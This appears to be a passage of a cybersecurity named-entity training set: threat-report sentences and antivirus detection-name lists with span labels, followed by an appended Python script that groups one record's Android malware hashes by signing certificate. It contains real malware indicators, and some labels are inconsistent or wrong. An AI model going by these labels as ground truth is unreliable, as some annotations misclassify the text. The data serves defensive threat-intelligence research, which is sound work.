W32/Webber.J TrojanProxy.Webber.r TR/Proxy.Webber.B Trojan[Proxy]/Win32.Webber Win32.Troj.Webber.b.kcloud TrojanProxy:Win32/Webber.B Win-Trojan/Webber.6176 Trojan.Proxy.Webber.B Win32/TrojanProxy.Webber.B W32/DwnLdr.MO!tr Proxy.2.AM Trojan.Win32.Webber.aY Win32/Trojan.a1a", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000731", "source": "cyner2_train"}} {"text": "A backdoor also known as: DLOADER.Trojan Heuristic.Malware", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000733", "source": "cyner2_train"}} {"text": "They are never well detected but recent ones are getting very poor detections by antiviruses.", "spans": {}, "info": {"id": "cyner2_train_000737", "source": "cyner2_train"}} {"text": "This exploit kit evolves on an almost constant basis.", "spans": {"MALWARE: exploit kit": [[5, 16]]}, "info": {"id": "cyner2_train_000739", "source": "cyner2_train"}} {"text": "A backdoor also known as: Application.Hacktool.MD Tool.Kiser.Win32.1373 HackTool.Win32.HackAV.c Application.Hacktool.MD Application.Hacktool.MD BehavesLike.Win32.BadFile.vm W32/Application.MUHU-1657 HackTool.HackAV.e HackTool:Win32/Kapahyku.A Application.Hacktool.MD HackTool.W32.HackAV.tn1i HackTool.Win32.HackAV.c Application.Hacktool.MD Unwanted/Win32.HackAV.R173782 RiskWare.Tool.HCK RiskWare.HackAV! 
PUA.RiskWare.HackAV Win32/Application.Hacktool.63c", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000740", "source": "cyner2_train"}} {"text": "The WildFire Locker ransomware has risen from the dead and rebranded itself using the apropos name of Hades Locker.", "spans": {"MALWARE: WildFire Locker ransomware": [[4, 30]], "MALWARE: Hades Locker.": [[102, 115]]}, "info": {"id": "cyner2_train_000741", "source": "cyner2_train"}} {"text": "A backdoor also known as: Dos.Clodf80.Trojan.7c93 Trojan.AOL.PWS.SUPERNAUT.A Trojan.AOL.PWS.SUPERNAUT.A Smalltroj.JNY Trojan.AOL.Supernaut Trojan-IM.Win16.Supernaut Trojan.AOL.PWS.SUPERNAUT.A Trojan.Win16.Supernaut.hqzm Trojan.Win16.A.IM-Supernaut.47117 Win16.Trojan-im.Supernaut.Ebgh Trojan.AOL.PWS.SUPERNAUT.A TrojWare.Win16.AOL.Supernaut Trojan.AOL.PWS.SUPERNAUT.A Trojan.Supernaut.Win16.1 Trojan/AOL.Supernaut TR/Aol.Supernaut Trojan[IM]/Win16.Supernaut Win32.Troj.Undef.kcloud Trojan.AOL.PWS.SUPERNAUT.A Trojan.Win16.Supernaut.Au Win16/AOL.Supernaut NORMAL:Trojan.AOL.Supernaut!19246 Trojan-AOL.Win16.Supernaut W16/AOL.D!tr Trj/AOLPS.D Win32/Trojan.AOL.52f", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000743", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Boaxxe.E Trojan.FakeMS.ED Win32.Trojan.WisdomEyes.16070401.9500.9999 TROJ_ZBOT.SMUH Win32.Trojan.Zbot.N Packed.Win32.Krap.iu Trojan.Win32.Krap.brabpa Packer.W32.Krap.lKMc TrojWare.Win32.Kazy.FOF Trojan.DownLoad3.2720 Win32.Troj.Krap.iu.kcloud Trojan.Graftor.D487A Trojan/Win32.Plosa.R24487 Packed.Win32.Krap.iu BScope.Malware-Cryptor.SB.01798 Bck/Qbot.AO W32/ZBOT.HL!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000744", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Securityshield W32/Trojan.JOHS-0158 Trojan-FakeAV.Win32.SecurityShield.vip Trojan.Win32.FakeAV.euwntc Win32.Trojan-fakeav.Securityshield.Syrj Trojan.Click2.45032 BehavesLike.Win32.Spyware.dc 
TR/Pingdel.A.15 W32.W.AutoIt.mr6E Trojan-FakeAV.Win32.SecurityShield.vip Trojan.Win32.Pingdel W32/SecurityShield.RMG!tr Win32/Trojan.228", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000745", "source": "cyner2_train"}} {"text": "A backdoor also known as: Dropper.Msil.BO", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000746", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Vetor.PE Virus.Win32.Virut.1!O W32.Virut.G W32.Virut.CF Win32/Virut.17408 PE_VIRUX.O Win.Phishing.NikoLata-6332081-0 Win32.Virus.Virut.Q Virus.Win32.Virut.ce Virus.Win32.Virut.hpeg Virus.Win32.Virut.CE Win32.Virut.56 PE_VIRUX.O Trojan.MSIL.TrojanClicker Win32/Virut.bt Virus/Win32.Virut.ce Win32.Virut.cr.61440 TrojanClicker:MSIL/Worfload.A!bit W32.Virut.lqtW Virus.Win32.Virut.ce Win32/Virut.F Virus.Virut.14 W32/Sality.AO Win32/Virut.NBP Virus.Win32.VirutChangeEntry.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000747", "source": "cyner2_train"}} {"text": "Typically, file-less malware has been observed in the context of Exploit Kits such as Angler.", "spans": {"MALWARE: file-less malware": [[11, 28]], "MALWARE: Exploit Kits": [[65, 77]], "MALWARE: Angler.": [[86, 93]]}, "info": {"id": "cyner2_train_000748", "source": "cyner2_train"}} {"text": "These lures were expected, until we started digging into the actual documents attached and saw an interesting method within the Visual Basic VB macros in the attached documents used for dropping the malware.", "spans": {"MALWARE: Visual Basic VB macros": [[128, 150]], "MALWARE: malware.": [[199, 207]]}, "info": {"id": "cyner2_train_000749", "source": "cyner2_train"}} {"text": "However, the occasional functional enhancements combined with its multiple layers of obfuscation and server-side polymorphism periodically breathe new life into this seemingly immortal malware.", "spans": {"MALWARE: malware.": [[185, 193]]}, "info": {"id": "cyner2_train_000750", 
"source": "cyner2_train"}} {"text": "A backdoor also known as: W32.CombotoD.Trojan Backdoor.Minaps BKDR_MINAPS.A W32/Trojan.WDQB-6441 Backdoor.Wakeminap!g1 BKDR_MINAPS.A Win.Downloader.133181-1 Trojan.Win32.Snojan.jj Trojan.Win32.A.Downloader.52224.HP DLOADER.Trojan Backdoor:Win32/Minaps.A Trojan.Win32.Snojan.jj Win32.Trojan.Snojan.Wrgx Win32/Trojan.cb9", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000751", "source": "cyner2_train"}} {"text": "Compromised hosts cause a victim's machine to be attached to the Andromeda botnet, giving attackers the ability to push plugins or additional malware onto these machines.", "spans": {"SYSTEM: victim's machine": [[26, 42]], "MALWARE: Andromeda botnet,": [[65, 82]], "THREAT_ACTOR: attackers": [[90, 99]], "MALWARE: plugins": [[120, 127]], "MALWARE: additional malware": [[131, 149]], "SYSTEM: machines.": [[161, 170]]}, "info": {"id": "cyner2_train_000752", "source": "cyner2_train"}} {"text": "In early 2016 the Callisto Group began sending highly targeted spear phishing emails with malicious attachments that contained, as their final payload, the Scout malware tool from the HackingTeam RCS Galileo platform.", "spans": {"THREAT_ACTOR: the Callisto Group": [[14, 32]], "MALWARE: final payload, the Scout malware tool": [[137, 174]], "ORGANIZATION: HackingTeam": [[184, 195]], "SYSTEM: RCS Galileo platform.": [[196, 217]]}, "info": {"id": "cyner2_train_000753", "source": "cyner2_train"}} {"text": "Our analysis reveals that APT33 is a capable group that has carried out cyber espionage operations since at least 2013.", "spans": {"THREAT_ACTOR: APT33": [[26, 31]], "THREAT_ACTOR: group": [[45, 50]], "THREAT_ACTOR: cyber espionage operations": [[72, 98]]}, "info": {"id": "cyner2_train_000754", "source": "cyner2_train"}} {"text": "Package Name SHA256 digest SHA1 certificate com.network.android 98ca5f94638768e7b58889bb5df4584bf5b6af56b188da48c10a02648791b30c 516f8f516cc0fd8db53785a48c0a86554f75c3ba 
com.network.android 5353212b70aa096d918e4eb6b49eb5ad8f59d9bec02d089e88802c01e707c3a1 44f6d1caa257799e57f0ecaf4e2e216178f4cb3d com.binary.sms.receiver 9fae5d148b89001555132c896879652fe1ca633d35271db34622248e048c78ae 7771af1ad3a3d9c0b4d9b55260bb47c2692722cf com.android.copy e384694d3d17cd88ec3a66c740c6398e07b8ee401320ca61e26bdf96c20485b4 7771af1ad3a3d9c0b4d9b55260bb47c2692722cf com.android.copy 12e085ab85db887438655feebd249127d813e31df766f8c7b009f9519916e389 7771af1ad3a3d9c0b4d9b55260bb47c2692722cf com.android.copy 6348104f8ef22eba5ac8ee737b192887629de987badbb1642e347d0dd01420f8 31a8633c2cd67ae965524d0b2192e9f14d04d016 FinFisher exposed : A researcher ’ s tale of defeating traps , tricks , and complex virtual machines March 1 , 2018 Office 365 Advanced Threat Protection ( Office 365 ATP ) blocked many notable zero-day exploits in 2017 .", "spans": {"MALWARE: FinFisher": [[795, 804]], "SYSTEM: Office 365 Advanced Threat Protection": [[911, 948]], "SYSTEM: Office 365 ATP": [[951, 965]]}, "info": {"id": "cyner2_train_000755", "source": "cyner2_train"}} {"text": "This malware has been around since 2011 and shows no signs of stopping.", "spans": {"MALWARE: malware": [[5, 12]]}, "info": {"id": "cyner2_train_000757", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9982 Trojan.Win32.Dwn.eenglt Win32.Trojan.Spy.Peqf Trojan.DownLoader14.35508 BehavesLike.Win32.HToolMimiKatz.dc Trojan.Symmi.D8341 PWS:Win32/Banker.UC!bit Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000760", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/Swisyn.aqrf Win32.Trojan.WisdomEyes.16070401.9500.9996 Win.Trojan.Swisyn-969 Trojan.Win32.Swisyn.deruf Trojan.Win32.A.Swisyn.7680.G Uds.Dangerousobject.Multi!c Trojan.Swisyn.Win32.16931 BehavesLike.Win32.Trojan.zt Trojan/Swisyn.njs Trojan/Win32.Swisyn TrojanDownloader:Win32/Surin.B Trojan.Swisyn!uy708DPUCgU Trojan.Win32.Swisyn W32/Dx.WKM!tr 
Win32/Trojan.ee6", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000761", "source": "cyner2_train"}} {"text": "Bookworm has little malicious functionality built-in, with its only core ability involving stealing keystrokes and clipboard contents.", "spans": {"MALWARE: Bookworm": [[0, 8]], "MALWARE: malicious": [[20, 29]]}, "info": {"id": "cyner2_train_000763", "source": "cyner2_train"}} {"text": "A backdoor also known as: Worm/W32.VBNA.28672.Z Trojan-Ransom.Win32.Blocker!O Worm.VBNA.Win32.168532 Win32.Trojan.WisdomEyes.16070401.9500.9999 Win32/VB.OHY HT_DROJ_GG310200.UVPM Trojan-Ransom.Win32.Blocker.cdug Trojan.Win32.VB.crkzva Worm.Win32.VBNA.28672.I Trojan.MulDrop4.59381 HT_DROJ_GG310200.UVPM BehavesLike.Win32.VBObfus.mz Worm/VBNA.hggx Trojan/Win32.Vilsel.gic Trojan.Barys.D819 Trojan-Ransom.Win32.Blocker.cdug Trojan:Win32/Droj.A Worm/Win32.VBNA.R79506 Worm.VBNA Trojan.Crypt", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000765", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.MSIL Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.DownLoader26.11210 TR/Dropper.MSIL.aexpd Trojan:MSIL/Upadter.A Trj/GdSda.A Win32.Trojan.Inject.Auto Trojan.MSIL.Inject Win32/Backdoor.990", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000767", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojandownloader.Tosct Win32.Trojan.WisdomEyes.16070401.9500.9994 BKDR_WEBRV.A Trojan.Click2.39104 BKDR_WEBRV.A W32/Trojan.KRMY-0312 Trojan.Heur.JP.ED64BF TrojanDownloader:Win32/Tosct.B", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000768", "source": "cyner2_train"}} {"text": "Today, RSA Research published an in-depth report on a commercial VPN network, originating in China, which we are calling Terracotta", "spans": {"ORGANIZATION: RSA Research": [[7, 19]], "SYSTEM: commercial VPN network,": [[54, 77]], "MALWARE: Terracotta": [[121, 131]]}, "info": {"id": 
"cyner2_train_000769", "source": "cyner2_train"}} {"text": "At the end of March 2017, we detected another malicious document leveraging an unknown vulnerability in EPS and a recently patched vulnerability in Windows Graphics Device Interface GDI to drop malware.", "spans": {"VULNERABILITY: unknown vulnerability": [[79, 100]], "SYSTEM: EPS": [[104, 107]], "VULNERABILITY: vulnerability": [[131, 144]], "SYSTEM: Windows Graphics Device Interface": [[148, 181]], "MALWARE: malware.": [[194, 202]]}, "info": {"id": "cyner2_train_000770", "source": "cyner2_train"}} {"text": "Increasingly, cyberattackers have been leveraging non-malware attack methods to target vulnerable organizations.", "spans": {"THREAT_ACTOR: cyberattackers": [[14, 28]], "MALWARE: non-malware attack": [[50, 68]], "VULNERABILITY: vulnerable organizations.": [[87, 112]]}, "info": {"id": "cyner2_train_000774", "source": "cyner2_train"}} {"text": "A backdoor also known as: Troj.W32.Jorik.Virut.ltFj BehavesLike.Win32.Parite.cm Trojan.Kazy.D23845 Trojan:Win32/Dantmil.A Win32/RiskWare.PEMalform.E", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000775", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Downloader.NSIS.BI Trojan.NSIS.Minix.A Trojan.Downloader.NSIS.BI TROJ_DLDR.SMIM Trackware.MegaSearch TROJ_DLDR.SMIM Win.Trojan.Clicker-3867 Trojan.Downloader.NSIS.BI Trojan.Downloader.NSIS.BI Trojan.Win32.Dwn.kvabt Trojan.Downloader.NSIS.BI Trojan.DownLoader4.20561 Downloader.NSIS.Win32.1874 TrojanDownloader:Win32/Minix.A Trj/CI.A W32/Dloader.EP!tr.NSIS Win32/Trojan.Downloader.79d", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000776", "source": "cyner2_train"}} {"text": "A backdoor also known as: Infostealer.Lokibot Trojan.PWS.Stealer.18836 TROJ_HPUTOTI.SMQ BehavesLike.Win32.Downloader.dh DR/Autoit.ppevb Trojan:Win32/Lepoh.A Spyware.LokiBot Trojan.Win32.Injector Trj/CI.A Win32/Trojan.15d", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": 
{"id": "cyner2_train_000779", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor/W32.Redsip.49152 Backdoor.Redsip.Win32.2 Trojan.Heur.LP.EDEA74 W32/Backdoor2.HIOG Hacktool.Keylogger Win32/Redsip.A BKDR_REDSIP.C Trojan.Win32.Redsip.dcevd Uds.Dangerousobject.Multi!c BKDR_REDSIP.C Backdoor.Win32.Redsip W32/Backdoor.WNDK-6859 TR/Spy.49152.662 Trojan[Backdoor]/Win32.Redsip Win32.Hack.Redsip.b.kcloud Backdoor:Win32/Redsip.B!svc Win-Trojan/Nightdragon.49152 Backdoor.Redsip Win32/Redsip.AA Win32.Trojan.Spy.Lohv W32/REDSIP.B!tr.bdr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000780", "source": "cyner2_train"}} {"text": "Unit 42 has reported on various Sofacy group attacks over the last year, most recently with a post on Komplex, an OS X variant of a tool commonly used by the Sofacy group.", "spans": {"THREAT_ACTOR: Sofacy group": [[32, 44]], "MALWARE: Komplex,": [[102, 110]], "SYSTEM: OS X": [[114, 118]], "MALWARE: tool": [[132, 136]], "THREAT_ACTOR: the Sofacy group.": [[154, 171]]}, "info": {"id": "cyner2_train_000781", "source": "cyner2_train"}} {"text": "Analyzing malware is often like solving a puzzle, you have to do it piece by piece to reach the final image.", "spans": {}, "info": {"id": "cyner2_train_000784", "source": "cyner2_train"}} {"text": "By connecting multiple Black Vine campaigns, we traced how the attack group has evolved over the last three years.", "spans": {"THREAT_ACTOR: Black Vine campaigns,": [[23, 44]], "THREAT_ACTOR: attack group": [[63, 75]]}, "info": {"id": "cyner2_train_000785", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Zusy.D2F05E Win32.Trojan.WisdomEyes.16070401.9500.9757 Trojan.Win32.Badur.cubwxj TrojWare.Win32.Delf.ebs Trojan.DownLoader9.4478 BehavesLike.Win32.Sytro.ch TrojanDownloader:Win32/Cefunlor.A Trojan/Win32.Downloader.R91863 TScope.Trojan.Delf Spyware.PasswordStealer Trojan-Dropper.Delf W32/Delf.RQV!tr.dldr Trj/Dtcontx.L", "spans": {"MALWARE: backdoor": 
[[2, 10]]}, "info": {"id": "cyner2_train_000789", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Vetor.PE Virus.Win32.Virut.1!O W32.Virut.G W32.Virut.CF Win32/Virut.17408 PE_VIRUX.R Virus.Win32.Virut.ce Virus.Win32.Virut.hpeg W32.Virut.lGNe Virus.Win32.Virut.CE Win32.Virut.56 Virus.Virut.Win32.1938 PE_VIRUX.R BehavesLike.Win32.Ramnit.fh Trojan.Win32.Malex Win32/Virut.bt Win32.Virut.dd.368640 TrojanDownloader:Win32/Otlard.D Virus.Win32.Virut.ce Win32.Virus.Virut.U Win32/Virut.F Virus.Virut.14 Win32/Virut.NBP W32/Virut.CE W32/Sality.AO Virus.Win32.VirutChangeEntry.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000791", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Win32.SilentSpy.zmwjp Backdoor.SilentSpy Silentspy.F Win32/SilentSpy.208 BKDR_SILENTSPY.C Trojan.W32.Fadedoor.10B-3 Backdoor.Win32.SilentSpy.208 Backdoor.SilentSpy.D Backdoor.Win32.SilentSpy.208 BackDoor.Silent.208 BKDR_SILENTSPY.C Win32.Hack.SilentSpy.20.kcloud Backdoor.Win32.SilentSpy_208.559104 Win-Trojan/SilentSpy.559104 Backdoor.SilentSpy Win32/SilentSpy.208 Backdoor.Win32.SilentSpy.200 W32/Bdoor.ZT!tr.bdr BackDoor.Silentspy.G", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000792", "source": "cyner2_train"}} {"text": "A backdoor also known as: HackTool.Incognito Trojan.Win32.Meterpreter.exjxlb Trojan.Win64.Meterpreter W32/Trojan.VCYK-3916 HackTool.Meterpreter.ei HackTool/Win32.Meterpreter Trj/GdSda.A Win32.Hacktool.Meterpreter.Phqd Win32/Trojan.Hacktool.8d0", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000794", "source": "cyner2_train"}} {"text": "A backdoor also known as: Worm/W32.PadoBot.86528 W32.Sality.U Worm.Padobot.D Win32/Sality.NBA W32/Korgo.V W32.Sality.AE Korgo.V PE_SALITY.RL Worm.Padobot.M Net-Worm.Win32.Padobot.m Worm.Padobot.BV.Dam Worm.Korgo Net-Worm.Win32.Padobot!IK Worm.Padobot.BV.Dam Win32.Lsabot W32/Sality.AT PE_SALITY.RL Win32/Sality.AA Worm:Win32/Korgo.V 
Win32.Sality.N Worm.Padobot.BV.Dam W32/Korgo.V Win32/IRCBot.worm.variant Virus.Win32.Sality.bakb Malware.Sality Worm.Padobot.bl Net-Worm.Win32.Padobot W32/Padobot!worm.im Worm/Korgo.A W32/Korgo.U.worm", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000795", "source": "cyner2_train"}} {"text": "The first message after establishing the connection is always sent by the server – the most important thing it contains is a random 128-byte key used for encrypting further communication.", "spans": {"SYSTEM: server": [[74, 80]]}, "info": {"id": "cyner2_train_000796", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.SampleswareTG.Trojan Trojan-GameThief.Win32.Magania!O Backdoor.Farfli.O Trojan/Magania.eken Win32.Trojan.Farfli.ai Win32/Farfli.GKH Win.Trojan.Magania-19224 Trojan-GameThief.Win32.Magania.uagj Trojan.Win32.Magania.bvkxn Troj.W32.MMM.ljA2 Backdoor.Win32.Gh0st.g Trojan.Magania.Win32.38676 BKDR_INJECT.SMJ BehavesLike.Win32.Backdoor.cc Backdoor/IRCBot.qan Trojan.Barys.62 Trojan-GameThief.Win32.Magania.uagj Trojan/Win32.PcClient.R12944 TrojanPSW.Magania Win32/Farfli.AK Trojan.Farfli!czCLTsqt/Nw Backdoor.Win32.FirstInj Backdoor.Win32.Gh0st.BH", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000797", "source": "cyner2_train"}} {"text": "Several months ago I examined a malware-tainted Word document titled ISIS_twitter_list.doc. 
I didn't think much of it and quickly moved on after a cursory analysis.", "spans": {}, "info": {"id": "cyner2_train_000799", "source": "cyner2_train"}} {"text": "As of late December 2019, ITG03-derived macOS malware was discovered being hosted on a fake cryptocurrency-related website, also likely designed by ITG03.", "spans": {"THREAT_ACTOR: ITG03-derived": [[26, 39]], "SYSTEM: macOS": [[40, 45]], "MALWARE: malware": [[46, 53]], "THREAT_ACTOR: ITG03.": [[148, 154]]}, "info": {"id": "cyner2_train_000801", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9982 W32/Backdoor.TGTY-5139 Backdoor.Trojan Win32/Smalldoor.RX BKDR_SHARK.WMP BackDoor.Werchan BKDR_SHARK.WMP W32/Backdoor2.HITJ Trojan.Graftor.Elzob.D3B3C TrojanProxy:Win32/Zolpiq.A Trojan/Win32.Dllbot.R811 Backdoor.Swofi.121 Win32/Trojan.256", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000802", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Tinba.WR4 Trojan/Tinba.be Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Backdoor2.HYQY Trojan.Win32.Inject.dqhpeo TrojWare.Win32.Tinba.BD Trojan.PWS.Tinba.153 Dropper.Injector.Win32.66634 Trojan.Win32.Exploit W32/Backdoor.DVHN-3684 TrojanDropper.Injector.avtd TR/Crypt.Xpack.182297 Trojan[Dropper]/Win32.Injector Trojan/Win32.Small.R145411 TrojanDropper.Injector Trojan.Symmi.DD5E0 Win32/Tinba.BE Trojan.DR.Injector!OJez9sRxlMc W32/Deshacop.XO!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000803", "source": "cyner2_train"}} {"text": "A backdoor also known as: BehavesLike.Win32.Dropper.dh Trojan.AD.Lnkget TR/AD.Lnkget.hrjck TrojanDownloader:BAT/Lnkget.B Trojan/Win32.PcClient.C204685", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000804", "source": "cyner2_train"}} {"text": "The results are described in this report.The Trojan may then perform the following actions:Open and close the CD tray Steal Outlook password Steal 
login passwords to websites Intercept network traffic", "spans": {"MALWARE: Trojan": [[45, 51]]}, "info": {"id": "cyner2_train_000805", "source": "cyner2_train"}} {"text": "In addition, this template file could also potentially be used to download other malicious payloads to the victim s computer.", "spans": {"MALWARE: malicious payloads": [[81, 99]], "SYSTEM: computer.": [[116, 125]]}, "info": {"id": "cyner2_train_000806", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/W32.Xorist.13824 TrojanRansom.Xorist.bh Trojan/Xorist.bh Trojan.Xorist!Ff7hNbBp1Hc W32/NetworkWorm.ROB Trojan-Ransom.Win32.Xorist.bh Trojan.Encoder.91 TR/Ransom.Xorist.BH.3 Trojan/Xorist.q Trojan:Win32/Filecoder.D Trojan/Win32.Xorist Trojan-Ransom.Win32.Xorist", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000807", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.KowinH.Worm Backdoor/W32.PopWin.17408 Backdoor.Win32.Popwin!O Trojan.FakeMS.ED Win32.Trojan.WisdomEyes.16070401.9500.9938 W32.Popwin Win32/Pipown.EI TROJ_NSPAK.A Backdoor.Win32.Popwin.anx Backdoor.Win32.Popwin.~IQ Trojan.Popwin TROJ_NSPAK.A Trojan[Backdoor]/Win32.Popwin Win32.Hack.NsPackT.a.kcloud Trojan:Win32/Pepatch.E Backdoor.Win32.Popwin.anx Worm/Win32.AutoRun.R7462 Worm.Win32.AutoRun Win32/Backdoor.1ad", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000811", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.HfsAutoB.7B64 Trojan/W32.DoS.188416.C DoS.Win32.Small!O Trojan.Small DoS.W32.Small.to1D W32/VirTool.TK Win.Trojan.Small-13866 DoS.Win32.Small.ai Trojan.Win32.Small.bqdli Trojan.Win32.Small.188416 Trojan.Inject.762 Virus.Win32.Small W32/Tool.FQGY-6235 DoS.Small.h HackTool[DoS]/Win32.Small DoS.Win32.Small.ai HackTool:Win32/Upsodos.A Trojan/Win32.Flooder.R118574 DoS.Small Win32.Trojan.Small.Hpd Win32/Trojan.5b5", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000813", "source": "cyner2_train"}} 
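The record with id cyner2_train_000755 above carries a flattened Android IOC table (package name, APK SHA-256 digest, signing-certificate SHA-1) with the unrelated title "FinFisher exposed ..." run onto its end by extraction. The check a practitioner wants on such a table is not the file hashes, which change with every rebuild, but the signing certificate: two packages signed with the same key were built by whoever holds that key, and in this table com.binary.sms.receiver and two com.android.copy samples share one certificate while com.network.android appears under two different ones. The Python below is an added example, not code from the page or from the report the table came from; the six rows are copied verbatim from that record, while the parsing rules, the function names and the malformed-row inputs used for testing are this example's own.

```python
"""Pivot a flattened Android IOC table by APK signing certificate.

Added example, not code from the page or from the report the table came from.
The six rows in FLATTENED_TABLE are copied verbatim from the record above
(package name, APK SHA-256, signing-certificate SHA-1); the parsing rules and
function names are this example's own.
"""
import re
from collections import defaultdict

# Table text as it was flattened in the record above: header words followed by
# six rows of three whitespace-separated fields, no column separators.
FLATTENED_TABLE = (
    "Package Name SHA256 digest SHA1 certificate "
    "com.network.android 98ca5f94638768e7b58889bb5df4584bf5b6af56b188da48c10a02648791b30c 516f8f516cc0fd8db53785a48c0a86554f75c3ba "
    "com.network.android 5353212b70aa096d918e4eb6b49eb5ad8f59d9bec02d089e88802c01e707c3a1 44f6d1caa257799e57f0ecaf4e2e216178f4cb3d "
    "com.binary.sms.receiver 9fae5d148b89001555132c896879652fe1ca633d35271db34622248e048c78ae 7771af1ad3a3d9c0b4d9b55260bb47c2692722cf "
    "com.android.copy e384694d3d17cd88ec3a66c740c6398e07b8ee401320ca61e26bdf96c20485b4 7771af1ad3a3d9c0b4d9b55260bb47c2692722cf "
    "com.android.copy 12e085ab85db887438655feebd249127d813e31df766f8c7b009f9519916e389 7771af1ad3a3d9c0b4d9b55260bb47c2692722cf "
    "com.android.copy 6348104f8ef22eba5ac8ee737b192887629de987badbb1642e347d0dd01420f8 31a8633c2cd67ae965524d0b2192e9f14d04d016"
)

# An Android package name is dotted lowercase identifiers; the two digests are
# fixed-width hex. These three shapes let a row be recovered from the token
# stream even though the column separators were lost.
PACKAGE_RE = re.compile(r"^[a-z_][a-z0-9_]*(\.[a-z_][a-z0-9_]*)+$")
SHA256_RE = re.compile(r"^[0-9a-f]{64}$")
SHA1_RE = re.compile(r"^[0-9a-f]{40}$")


def parse_ioc_table(text):
    """Return a list of (package, apk_sha256, cert_sha1) tuples.

    A token that looks like a package name starts a row and must be followed by
    a SHA-256 and a SHA-1; other tokens (the header words) are skipped.
    Raises ValueError when a row is truncated or a digest is malformed, so a
    damaged paste is rejected instead of silently yielding fewer rows.
    """
    tokens = text.split()
    rows = []
    i = 0
    while i < len(tokens):
        pkg = tokens[i]
        if not PACKAGE_RE.match(pkg):
            i += 1  # header word such as "Package" or "SHA256"
            continue
        if i + 2 >= len(tokens):
            raise ValueError(f"row for {pkg} is truncated")
        sha256, sha1 = tokens[i + 1].lower(), tokens[i + 2].lower()
        if not SHA256_RE.match(sha256) or not SHA1_RE.match(sha1):
            raise ValueError(f"row for {pkg} has a malformed digest")
        rows.append((pkg, sha256, sha1))
        i += 3
    return rows


def table_is_well_formed(text):
    """True if every row parses; use it to reject a damaged copy-paste up front."""
    try:
        parse_ioc_table(text)
        return True
    except ValueError:
        return False


def pivot_by_certificate(rows):
    """Map cert_sha1 -> sorted list of (package, apk_sha256).

    APKs signed by the same certificate were signed with the same private key,
    so a certificate shared across differently named packages ties them to one
    developer far more reliably than package names or per-build file hashes.
    """
    by_cert = defaultdict(list)
    for pkg, sha256, cert in rows:
        by_cert[cert].append((pkg, sha256))
    return {cert: sorted(samples) for cert, samples in by_cert.items()}


def linked_packages(rows):
    """Package names that share a signing certificate with a differently named package."""
    linked = set()
    for samples in pivot_by_certificate(rows).values():
        names = {pkg for pkg, _ in samples}
        if len(names) > 1:
            linked |= names
    return linked


def certificates_for_package(rows, package):
    """Sorted distinct signing certificates seen under one package name.

    More than one certificate for the same name means the name alone is not a
    stable indicator: several actors reuse it, or the developer rotated keys.
    """
    return sorted({cert for pkg, _, cert in rows if pkg == package})


if __name__ == "__main__":
    parsed = parse_ioc_table(FLATTENED_TABLE)
    for cert, samples in pivot_by_certificate(parsed).items():
        print(cert, [pkg for pkg, _ in samples])
    print("linked by certificate:", sorted(linked_packages(parsed)))
```

Running the block prints four certificate groups; the group under 7771af1a... holds one com.binary.sms.receiver and two com.android.copy samples, which is the link the file hashes alone would never show, and com.network.android turns up under two certificates, so that name on its own is a weak indicator.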
